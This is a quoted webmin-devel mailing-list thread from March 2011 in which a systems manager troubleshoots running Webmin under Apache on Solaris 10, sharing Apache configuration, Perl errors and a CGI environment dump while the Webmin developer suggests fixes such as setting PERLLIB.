> SSL_SERVER_S_DN_OU=<data>
> SSL_SERVER_S_DN_ST=<data>
> SSL_SERVER_V_END=Feb  1 23:59:59 2012 GMT
> SSL_SERVER_V_START=Feb  1 00:00:00 2011 GMT
> SSL_SESSION_ID=<data>
> SSL_VERSION_INTERFACE=mod_ssl/2.2.16
> SSL_VERSION_LIBRARY=OpenSSL/0.9.7d
> TZ=US/Eastern
> UNIQUE_ID=<data>
> WEBMIN_CONFIG=/etc/webmin
> WEBMIN_VAR=/var/webmin
> 
> ============================================================================================
> 
> Based upon all of the above, this all but has to be a permissions issue
> 
> Thanks again and have a great weekend!
> 
> Michael Peoples
> Senior Systems Manager
> AT&T - ATTSI
> Office:            614-789-8559
> Cell:    614-886-0923
> FAX:   614-789-8975
> mpe...@at...
> 
> This e-mail and any files transmitted with it are AT&T property, are confidential,
> and are intended solely for the use of the individual or entity to whom this email
> is addressed. If you are not one of the named recipient(s) or otherwise have reason
> to believe that you have received this message in error, please notify the sender
> and delete this message immediately from your computer. Any other use, retention,
> dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited."
> 
> 
> -----Original Message-----
> From: Jamie Cameron [mailto:jca...@we...] 
> Sent: Friday, March 18, 2011 5:00 PM
> To: Webmin development list
> Subject: Re: [webmin-devel]CORRECTION - PROBLEM NOT SOLVED RE:StumblingForward
> RE: Getting Webmin to rununderApacheforSolaris10-- Creating dent in desk from banging
> head.
> 
> One thing to check is if CGI scripts are being executed by Apache properly
> and with the correct permissions. Try putting a file named test.cgi in the 
> Webmin root directory (/opt/webmin) , and then accessing it in your browser.
> The script should contain :
> 
> #!/bin/sh
> echo Content-type: text/plain
> echo ""
> id -a
> env
> 
> And then post the output here.
> 
>  - Jamie
> 
> On 17/Mar/2011 17:30 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> > No luck with just the PERLLIB setting.  PERL5LIB is set in the default environment,
> > so it is most likely still "active".  Would that make a difference? I suppose
> it
> > probably would if webmin can't find the proper Perl.
> > 
> > It tried the following in both files to "suppress" the PERL5LIB value:
> > 
> > SetEnv PER5LIB ""
> > 
> > But it still failed.
> > 
> > Does anyone need to see something in particular to help me here?  I'll provide
> > what I can.
> > 
> > Michael Peoples
> > Senior Systems Manager
> > AT&T - ATTSI
> > Office:            614-789-8559
> > Cell:    614-886-0923
> > FAX:   614-789-8975
> > mpe...@at...
> > 
> > This e-mail and any files transmitted with it are AT&T property, are confidential,
> > and are intended solely for the use of the individual or entity to whom this
> email
> > is addressed. If you are not one of the named recipient(s) or otherwise have
> reason
> > to believe that you have received this message in error, please notify the sender
> > and delete this message immediately from your computer. Any other use, retention,
> > dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited."
> > 
> > 
> > -----Original Message-----
> > From: Jamie Cameron [mailto:jca...@we...] 
> > Sent: Thursday, March 17, 2011 2:22 PM
> > To: Webmin development list
> > Subject: Re: [webmin-devel]CORRECTION - PROBLEM NOT SOLVED RE: StumblingForward
> > RE: Getting Webmin to rununderApache forSolaris10-- Creating dent in desk from
> > banging head.
> > 
> > Are you sure you want to set PERL5LIB as well? That might be overriding PERLLIB
> > , which
> > is set correctly.
> > 
> > On 17/Mar/2011 06:31 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> > > I jumped the gun on this one.  My browser auto-filled another server with a
> similar
> > > name, and I failed to notice.  
> > > 
> > > The original problem still exists, with the same error messages as before.
> > > 
> > > I placed the following lines in both the main httpd.conf file and the virtual
> > server
> > > definition file.
> > > 
> > > SetEnv PERL5LIB "/usr/local/lib/perl5"
> > > SetEnv PERLLIB "/opt/webmin"
> > > 
> > > What else might I try?
> > > 
> > > Michael Peoples
> > > Senior Systems Manager
> > > AT&T - ATTSI
> > > Office:            614-789-8559
> > > Cell:    614-886-0923
> > > FAX:   614-789-8975
> > > mpe...@at...
> > > 
> > > This e-mail and any files transmitted with it are AT&T property, are confidential,
> > > and are intended solely for the use of the individual or entity to whom this
> > email
> > > is addressed. If you are not one of the named recipient(s) or otherwise have
> > reason
> > > to believe that you have received this message in error, please notify the
> sender
> > > and delete this message immediately from your computer. Any other use, retention,
> > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> prohibited."
> > > 
> > > 
> > > -----Original Message-----
> > > From: PEOPLES, MICHAEL P (ATTSI) 
> > > Sent: Thursday, March 17, 2011 9:10 AM
> > > To: Webmin development list
> > > Subject: Re: [webmin-devel] Stumbling Forward RE: Getting Webmin to rununderApache
> > > for Solaris10-- Creating dent in desk from banging head.
> > > 
> > > That did the trick.  You might wish to consider putting that in the documentation
> > > also.
> > > 
> > > Thanks.
> > > 
> > > Michael Peoples
> > > Senior Systems Manager
> > > AT&T - ATTSI
> > > Office:            614-789-8559
> > > Cell:    614-886-0923
> > > FAX:   614-789-8975
> > > mpe...@at...
> > > 
> > > This e-mail and any files transmitted with it are AT&T property, are confidential,
> > > and are intended solely for the use of the individual or entity to whom this
> > email
> > > is addressed. If you are not one of the named recipient(s) or otherwise have
> > reason
> > > to believe that you have received this message in error, please notify the
> sender
> > > and delete this message immediately from your computer. Any other use, retention,
> > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> prohibited."
> > > 
> > > -----Original Message-----
> > > From: Jamie Cameron [mailto:jca...@we...] 
> > > Sent: Wednesday, March 16, 2011 7:53 PM
> > > To: Webmin development list
> > > Subject: Re: [webmin-devel]Stumbling Forward RE: Getting Webmin to run underApache
> > > for Solaris10-- Creating dent in desk from banging head.
> > > 
> > > Sounds like maybe the PERLLIB environment variable isn't set to the webmin
> > > root directory (typically /usr/libexec/webmin or /usr/share/webmin). You will
> > > need to set that in your apache config, like WEBMIN_CONFIG is defined.
> > > 
> > > On 16/Mar/2011 13:57 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> > > > I have the Apache server responding on port 10000.  It even threw up a "Windows"
> > > > login dialog box (versus the standard Webmin login page).But now it's throwing
> > > > internal server (apache) errors:
> > > > 
> > > > Undefined subroutine &WebminCore::init_config called at /dev/fs/4 line 7.
> > > > Premature end of script headers: index.cgi
> > > > 
> > > > I can infer that Perl didn't effectively process the "use WebminCore;" line
> > properly,
> > > > but that may not be the issue.  This message seems very familiar to me for
> > some
> > > > reason.
> > > > 
> > > > Running index.cgi at the command line produces the following error:
> > > > 
> > > > # perl -w ./index.cgi
> > > > Name "WebminCore::STEST" used only once: possible typo at web-lib-funcs.pl
> > line
> > > > 1898.
> > > > Name "main::remote_user" used only once: possible typo at ./index.cgi line
> > 73.
> > > > WEBMIN_CONFIG not set at web-lib-funcs.pl line 3943.
> > > > Use of uninitialized value $callpkg in concatenation (.) or string at web-lib-funcs.pl
> > > > line 9231.
> > > > Use of uninitialized value $initial_module_name in string eq at web-lib-funcs.pl
> > > > line 8200.
> > > > Use of uninitialized value in string eq at web-lib-funcs.pl line 8200.
> > > > 
> > > > I would sort of expect that given that key environment variables are not
> set.
> > > > 
> > > > In both the httpd.conf file and the separate included file containing the
> Webmin
> > > > virtual server configuration, I have the four SetEnv statements.
> > > > 
> > > > I'm running Perl 5.12.0 and Webmin 1.530
> > > > 
> > > > Any thoughts?
> > > > 
> > > > Michael Peoples
> > > > Senior Systems Manager
> > > > AT&T - ATTSI
> > > > Office:            614-789-8559
> > > > Cell:    614-886-0923
> > > > FAX:   614-789-8975
> > > > mpe...@at...
> > > > 
> > > > This e-mail and any files transmitted with it are AT&T property, are confidential,
> > > > and are intended solely for the use of the individual or entity to whom this
> > > email
> > > > is addressed. If you are not one of the named recipient(s) or otherwise have
> > > reason
> > > > to believe that you have received this message in error, please notify the
> > sender
> > > > and delete this message immediately from your computer. Any other use, retention,
> > > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> > prohibited."
> > > > 
> > > > 
> > > > -----Original Message-----
> > > > From: Jamie Cameron [mailto:jca...@we...] 
> > > > Sent: Monday, March 14, 2011 8:15 PM
> > > > To: Webmin development list
> > > > Subject: Re: [webmin-devel]Getting Webmin to run under Apache for Solaris10--
> > > Creating
> > > > dent in desk from banging head.
> > > > 
> > > > On 14/Mar/2011 16:57 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> > > > > Jamie,
> > > > > 
> > > > > As always, I very much appreciate your prompt responses and help, as I
> know
> > > you
> > > > > have another life creating other great software.
> > > > > 
> > > > > If I missed, in the documentation, the need to put that directive in the
> > main
> > > > (global)
> > > > > Apache configuration, I apologize.  I really do RTFM before I bother busy
> > people.
> > > > > If I didn't miss it, perhaps if should be added.  I would be happy to make
> > > updates
> > > > > to the documents, particularly in areas where I was confused, but I have
> > no
> > > access.
> > > > 
> > > > Hi Michael,
> > > > 
> > > > The docs didn't mention that as most users who run webmin under apache do
> it
> > > because
> > > > they want or need to use port 80, which apache is already listening on. I
> will
> > > > update
> > > > the docs to mention this.
> > > > 
> > > > > Your question is a good one.  I was going to try it merely to see if there
> > > was
> > > > > an appreciable difference in performance.  What I can tell you within the
> > bounds
> > > > > of proprietary information is, and you may have guessed some of this from
> > previous
> > > > > questions, I (we) are using Webmin on a single server in an attempt to
> provide
> > > > > a front end for Enterprise management.  
> > > > > 
> > > > > We have come a long way and my feeling now is that it was the right decision.
> > > > > I believe we can leverage existing Webmin code and modules in an "abstracted"
> > > > manner
> > > > > where the interface is centrally located on an extremely secure server
> with
> > > secure
> > > > > access to large numbers of servers.  
> > > > > 
> > > > > So, I'm not suggesting there were any problems with miniserv.pl.  In fact,
> > > there's
> > > > > no inherent reason I couldn't use it to throw up any "web" language  I
> choose.
> > > > > 
> > > > > Sorry about being a bit fuzzy on the details, but I assure you that I will
> > > make
> > > > > every effort to publish what I can and still keep my job (the mortgage
> company
> > > > > is very fond of that monthly payment).
> > > > > 
> > > > > I'll put that directive in and run some comparative tests.
> > > > 
> > > > Ok, let us know how the performance tests work out ...
> > > > 
> > > >  - Jamie
> > > > 
> > > > > Again, thanks for all of the work you've done to help the larger IT community.
> > > > > 
> > > > > Michael Peoples
> > > > > Senior Systems Manager
> > > > > AT&T - ATTSI
> > > > > Office:            614-789-8559
> > > > > Cell:    614-886-0923
> > > > > FAX:   614-789-8975
> > > > > mpe...@at...
> > > > > 
> > > > > This e-mail and any files transmitted with it are AT&T property, are confidential,
> > > > > and are intended solely for the use of the individual or entity to whom
> this
> > > > email
> > > > > is addressed. If you are not one of the named recipient(s) or otherwise
> have
> > > > reason
> > > > > to believe that you have received this message in error, please notify
> the
> > > sender
> > > > > and delete this message immediately from your computer. Any other use,
> retention,
> > > > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> > > prohibited."
> > > > > 
> > > > > 
> > > > > -----Original Message-----
> > > > > From: Jamie Cameron [mailto:jca...@we...] 
> > > > > Sent: Monday, March 14, 2011 4:52 PM
> > > > > To: Webmin development list
> > > > > Subject: Re: [webmin-devel]Getting Webmin to run under Apache for Solaris10
> > > --
> > > > > Creating dent in desk from banging head.
> > > > > 
> > > > > Hi Michael,
> > > > > 
> > > > > Did you add the line :
> > > > > 
> > > > > Listen 10000
> > > > > 
> > > > > to your Apache config? Without this, Apache won't even accept connections
> > on
> > > > > port 10000.
> > > > > 
> > > > > Regarding the speed of Apache vs miniserv, even though Apache is far better
> > > webserver
> > > > > in general and written in a faster language (C), miniserv may actually
> be
> > more
> > > > > efficient
> > > > > for running Webmin as it can execute the perl CGI scripts within the same
> > process,
> > > > > without needing to launch a perl interpreter for each request as Apache
> would.
> > > > > 
> > > > > Could you tell us more about the kind of app you are running, and the performance
> > > > > issues you are seeing with regular Webmin?
> > > > > 
> > > > >  - Jamie
> > > > > 
> > > > > On 14/Mar/2011 12:38 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote
> ..
> > > > > > Reports are, there are advantages (speed at least) to running it under
> > Apache.
> > > > > > 
> > > > > > I hope I'm not telling you something you already know, I apologize if
> I
> > am,
> > > > but
> > > > > > the miniserv.pl (the Webmin web server) is essentially a looping Perl
> script.
> > > > > > Rather clever in my opinion and certainly much lighter than a full Apache
> > > implementation.
> > > > > > 
> > > > > > In our particular case, we're doing some unusual things with Webmin,
> so
> > I'm
> > > > trying
> > > > > > to squeeze every ounce of performance out of it.
> > > > > > 
> > > > > > Michael Peoples
> > > > > > Senior Systems Manager
> > > > > > AT&T - ATTSI
> > > > > > Office:            614-789-8559
> > > > > > Cell:    614-886-0923
> > > > > > FAX:   614-789-8975
> > > > > > mpe...@at...
> > > > > > 
> > > > > > This e-mail and any files transmitted with it are AT&T property, are
> confidential,
> > > > > > and are intended solely for the use of the individual or entity to whom
> > this
> > > > > email
> > > > > > is addressed. If you are not one of the named recipient(s) or otherwise
> > have
> > > > > reason
> > > > > > to believe that you have received this message in error, please notify
> > the
> > > > sender
> > > > > > and delete this message immediately from your computer. Any other use,
> > retention,
> > > > > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> > > > prohibited."
> > > > > > 
> > > > > > -----Original Message-----
> > > > > > From: Ron Wheeler [mailto:rwh...@ar...] 
> > > > > > Sent: Monday, March 14, 2011 2:33 PM
> > > > > > To: web...@li...
> > > > > > Subject: Re: [webmin-devel] Getting Webmin to run under Apache for Solaris
> > > > 10
> > > > > --
> > > > > > Creating dent in desk from banging head.
> > > > > > 
> > > > > > Why not just run it the way it is supposed to run on port 10000?
> > > > > > 
> > > > > > Ron
> > > > > > 
> > > > > > On 14/03/2011 2:25 PM, PEOPLES, MICHAEL P (ATTSI) wrote:
> > > > > > > I have spent days trying to get Webmin to run under Apache, but to
> no
> > > > > > > avail.  Despite attempting to follow both follow the instructions to
> > the
> > > > > > > letter, as well as interpret them as best I could, it doesn't work.
> > I'm
> > > > > > > sure it works, because Jamie says it does, and Jamie knows what he's
> > > > > > > talking about.  The problem is me.
> > > > > > >
> > > > > > > I am trying to run it as a virtual server on a Solaris 10 box running
> > > > > > > Apache 2.2.16.  I did the following:
> > > > > > >
> > > > > > > Created a virtual server
> > > > > > >
> > > > > > > <VirtualHost _default_:10000>
> > > > > > >
> > > > > > >      ServerName myserver.att.com:10000
> > > > > > >
> > > > > > >      DocumentRoot /opt/webmin
> > > > > > >
> > > > > > >      ServerAdmin mp...@at...
> > > > > > >
> > > > > > >      ErrorLog "/usr/apache2_2_16/logs/error_log"
> > > > > > >
> > > > > > >      TransferLog "/usr/apache2_2_16/logs/access_log"
> > > > > > >
> > > > > > >      ScriptAlias /cgi-bin/ "/usr/apache2_2_16/cgi-bin/"
> > > > > > >
> > > > > > >      ScriptAlias /script-cgi-bin/ "/usr/apache2_2_16/htdocs/scripts/"
> > > > > > >
> > > > > > >      SSLEngine on
> > > > > > >      SSLCertificateFile "/usr/apache2_2_16/conf/myserver.crt"
> > > > > > >      SSLCertificateKeyFile "/usr/apache2_2_16/conf/myserver.key"
> > > > > > >      SSLCACertificateFile "/usr/apache2_2_16/conf/myserver.CA.root.crt"
> > > > > > >      SSLCACertificateFile
> > > > > > > "/usr/apache2_2_16/conf/myserver.intermediate.crt"
> > > > > > >
> > > > > > >      <FilesMatch "\.(cgi|shtml|phtml|php)$">
> > > > > > >          SSLOptions +StdEnvVars
> > > > > > >      </FilesMatch>
> > > > > > >
> > > > > > >      <Directory "/usr/apache2_2_16/cgi-bin">
> > > > > > >          SSLOptions +StdEnvVars
> > > > > > >      </Directory>
> > > > > > >
> > > > > > >      BrowserMatch ".*MSIE.*" nokeepalive ssl-unclean-shutdown
> > > > > > > downgrade-1.0 force-response-1.0
> > > > > > >
> > > > > > >      CustomLog "/usr/apache2_2_16/logs/ssl_request_log"           "%t
> > %h
> > > > > > > %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> > > > > > >
> > > > > > >      <Directory "/opt/webmin">
> > > > > > >          allow from all
> > > > > > >          Options +Indexes
> > > > > > >          AuthName Webmin
> > > > > > >          AuthType basic
> > > > > > >          AuthUserFile /etc/webmin/htusers
> > > > > > >          require valid-user
> > > > > > >      </Directory>
> > > > > > >
> > > > > > > </VirtualHost>
> > > > > > >
> > > > > > > Added AddHandler directive to MAIN Apache configuration section
> > > > > > >
> > > > > > > AddHandler cgi-script .cgi
> > > > > > >
> > > > > > > Added index.cgi directive to MAIN Apache configuration section
> > > > > > >
> > > > > > > DirectoryIndex index.html index.cgi
> > > > > > >
> > > > > > > Added the following directives to MAIN Apache configuration section
> > > > > > >
> > > > > > > 		SetEnv WEBMIN_CONFIG /etc/webmin
> > > > > > > 		SetEnv WEBMIN_VAR /var/webmin
> > > > > > > 		SetEnv SERVER_ROOT /opt/webmin
> > > > > > > 		SetEnv MINISERV_CONFIG /etc/webmin/miniserv.conf
> > > > > > >
> > > > > > > Added the following directives to MAIN Apache configuration section
> > > > > > >
> > > > > > >      <Directory "/opt/webmin">
> > > > > > >          allow from all
> > > > > > >          Options +Indexes
> > > > > > >          AuthName Webmin
> > > > > > >          AuthType basic
> > > > > > >          AuthUserFile /etc/webmin/htusers
> > > > > > >          require valid-user
> > > > > > >      </Directory>
> > > > > > >
> > > > > > >
> > > > > > > /etc/webmin/htusers file setup
> > > > > > >
> > > > > > > Again, it's not clear what is being requested here.  I created a file
> > > > > > > with each of the users in it, one to a line, like the following:
> > > > > > >
> > > > > > > 		root
> > > > > > > 		user1
> > > > > > > 		user2
> > > > > > >
> > > > > > > I also tried using htpasswd to create a file called /etc/webmin/htusers,
> > > > > > > but that also did not change things.
> > > > > > >
> > > > > > > To be frank, I'm not sure what should be in this file.  Explicit
> > > > > > > examples would be helpful.
> > > > > > >
> > > > > > > Ran the ownership and permission attribute change commands
> > > > > > >
> > > > > > > 		chown -R root:root /opt/webmin
> > > > > > > 		chmod -R 6755 /opt/webmin
> > > > > > >
> > > > > > > > From directory /opt/webmin, ran the following command
> > > > > > >
> > > > > > > find . -name "*.cgi" -o -name "*.pl" | perl perlpath.pl "/usr/bin/perl
> > > > > > > -U" -
> > > > > > >
> > > > > > > Configure Webmin to use the 'Default Webmin Theme'
> > > > > > >
> > > > > > > There's nothing I could do here.  The only theme I have is the "blue"
> > > > > > > theme.  There is nothing in the Webmin Solaris package that might be
> > > > > > > considered a "default theme".
> > > > > > >
> > > > > > > I also tried it putting all (or most) of the above within the virtual
> > > > > > > host definition:
> > > > > > >
> > > > > > > <VirtualHost _default_:10000>
> > > > > > >
> > > > > > >      ServerName myserver.att.com:10000
> > > > > > >
> > > > > > >      DocumentRoot /opt/webmin
> > > > > > >
> > > > > > >      ServerAdmin mp...@at...
> > > > > > >
> > > > > > >      ErrorLog "/usr/apache2_2_16/logs/error_log"
> > > > > > >
> > > > > > >      TransferLog "/usr/apache2_2_16/logs/access_log"
> > > > > > >
> > > > > > >      ScriptAlias /cgi-bin/ "/usr/apache2_2_16/cgi-bin/"
> > > > > > >
> > > > > > >      ScriptAlias /script-cgi-bin/ "/usr/apache2_2_16/htdocs/scripts/"
> > > > > > >
> > > > > > >      SSLEngine on
> > > > > > >      SSLCertificateFile "/usr/apache2_2_16/conf/myserver.crt"
> > > > > > >      SSLCertificateKeyFile "/usr/apache2_2_16/conf/myserver.key"
> > > > > > >      SSLCACertificateFile "/usr/apache2_2_16/conf/myserver.CA.root.crt"
> > > > > > >      SSLCACertificateFile
> > > > > > > "/usr/apache2_2_16/conf/myserver.intermediate.crt"
> > > > > > >
> > > > > > >      AddHandler cgi-script .cgi
> > > > > > >
> > > > > > >      <FilesMatch "\.(cgi|shtml|phtml|php)$">
> > > > > > >          SSLOptions +StdEnvVars
> > > > > > >      </FilesMatch>
> > > > > > >
> > > > > > >      <Directory "/usr/apache2_2_16/cgi-bin">
> > > > > > >          SSLOptions +StdEnvVars
> > > > > > >      </Directory>
> > > > > > >
> > > > > > >      BrowserMatch ".*MSIE.*" nokeepalive ssl-unclean-shutdown
> > > > > > > downgrade-1.0 force-response-1.0
> > > > > > >
> > > > > > >      CustomLog "/usr/apache2_2_16/logs/ssl_request_log"           "%t
> > %h
> > > > > > > %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> > > > > > >
> > > > > > >      <Directory "/opt/webmin">
> > > > > > >          allow from all
> > > > > > >          Options +Indexes
> > > > > > >          AuthName Webmin
> > > > > > >          AuthType basic
> > > > > > >          AuthUserFile /etc/webmin/htusers
> > > > > > >          require valid-user
> > > > > > >      </Directory>
> > > > > > >
> > > > > > >      SetEnv WEBMIN_CONFIG "/etc/webmin"
> > > > > > >      SetEnv WEBMIN_VAR "/var/webmin"
> > > > > > >      SetEnv SERVER_ROOT "/opt/webmin"
> > > > > > >      SetEnv MINISERV_CONFIG "/etc/webmin/miniserv.conf"
> > > > > > > </VirtualHost>
> > > > > > >
> > > > > > > I restarted Apache after each change, but never got the Webmin site
> or
> > > > > > > any error messages even referring to it.  Nothing was listening on
> port
> > > > > > > 10000.
> > > > > > >
> > > > > > > I also tried the "Apache In A Sub-Directory" method, but it didn't
> work.
> > > > > > >
> > > > > > > If I fire up Webmin as I normally would, it works.  I just can't get
> > it
> > > > > > > to work under Apache.
> > > > > > >
> > > > > > > Sorry for the long e-mail, but thanks for any help anyone can offer.
> > > > > > >
> > > > > > > Michael Peoples
> > > > > > > Senior Systems Manager
> > > > > > > AT&T - ATTSI
> > > > > > > Office:            614-789-8559
> > > > > > > Cell:    614-886-0923
> > > > > > > FAX:   614-789-8975
> > > > > > > mpe...@at...
> > > > > > >
> > > > > > > This e-mail and any files transmitted with it are AT&T property, are
> > > > > > > confidential, and are intended solely for the use of the individual
> or
> > > > > > > entity to whom this email is addressed. If you are not one of the named
> > > > > > > recipient(s) or otherwise have reason to believe that you have received
> > > > > > > this message in error, please notify the sender and delete this message
> > > > > > > immediately from your computer. Any other use, retention, dissemination,
> > > > > > > forwarding, printing, or copying of this e-mail is strictly prohibited."
> > > > > > >
> > > > > > >
> > > > > > >
> > > > > > > ------------------------------------------------------------------------------
> > > > > > > Colocation vs. Managed Hosting
> > > > > > > A question and answer guide to determining the best fit
> > > > > > > for your organization - today and in the future.
> > > > > > > http://p.sf.net/sfu/internap-sfd2d
> > > > > > > -
> > > > > > > Forwarded by the Webmin development list at web...@we...
> > > > > > > To remove yourself from this list, go to
> > > > > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > > > > >
> > > > > > 
> > > > > > 
> > > > > > ------------------------------------------------------------------------------
> > > > > > Colocation vs. Managed Hosting
> > > > > > A question and answer guide to determining the best fit
> > > > > > for your organization - today and in the future.
> > > > > > http://p.sf.net/sfu/internap-sfd2d
> > > > > > -
> > > > > > Forwarded by the Webmin development list at web...@we...
> > > > > > To remove yourself from this list, go to
> > > > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > > > > 
> > > > > > ------------------------------------------------------------------------------
> > > > > > Colocation vs. Managed Hosting
> > > > > > A question and answer guide to determining the best fit
> > > > > > for your organization - today and in the future.
> > > > > > http://p.sf.net/sfu/internap-sfd2d
> > > > > > -
> > > > > > Forwarded by the Webmin development list at web...@we...
> > > > > > To remove yourself from this list, go to
> > > > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > > > 
> > > > > ------------------------------------------------------------------------------
> > > > > Colocation vs. Managed Hosting
> > > > > A question and answer guide to determining the best fit
> > > > > for your organization - today and in the future.
> > > > > http://p.sf.net/sfu/internap-sfd2d
> > > > > -
> > > > > Forwarded by the Webmin development list at web...@we...
> > > > > To remove yourself from this list, go to
> > > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > > 
> > > > ------------------------------------------------------------------------------
> > > > Colocation vs. Managed Hosting
> > > > A question and answer guide to determining the best fit
> > > > for your organization - today and in the future.
> > > > http://p.sf.net/sfu/internap-sfd2d
> > > > -
> > > > Forwarded by the Webmin development list at web...@we...
> > > > To remove yourself from this list, go to
> > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > 
> > > ------------------------------------------------------------------------------
> > > Colocation vs. Managed Hosting
> > > A question and answer guide to determining the best fit
> > > for your organization - today and in the future.
> > > http://p.sf.net/sfu/internap-sfd2d
> > > -
> > > Forwarded by the Webmin development list at web...@we...
> > > To remove yourself from this list, go to
> > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > 
> > > ------------------------------------------------------------------------------
> > > Colocation vs. Managed Hosting
> > > A question and answer guide to determining the best fit
> > > for your organization - today and in the future.
> > > http://p.sf.net/sfu/internap-sfd2d
> > > -
> > > Forwarded by the Webmin development list at web...@we...
> > > To remove yourself from this list, go to
> > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > 
> > ------------------------------------------------------------------------------
> > Colocation vs. Managed Hosting
> > A question and answer guide to determining the best fit
> > for your organization - today and in the future.
> > http://p.sf.net/sfu/internap-sfd2d
> > -
> > Forwarded by the Webmin development list at web...@we...
> > To remove yourself from this list, go to
> > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> 
> ------------------------------------------------------------------------------
> Colocation vs. Managed Hosting
> A question and answer guide to determining the best fit
> for your organization - today and in the future.
> http://p.sf.net/sfu/internap-sfd2d
> -
> Forwarded by the Webmin development list at web...@we...
> To remove yourself from this list, go to
> http://lists.sourceforge.net/lists/listinfo/webadmin-devel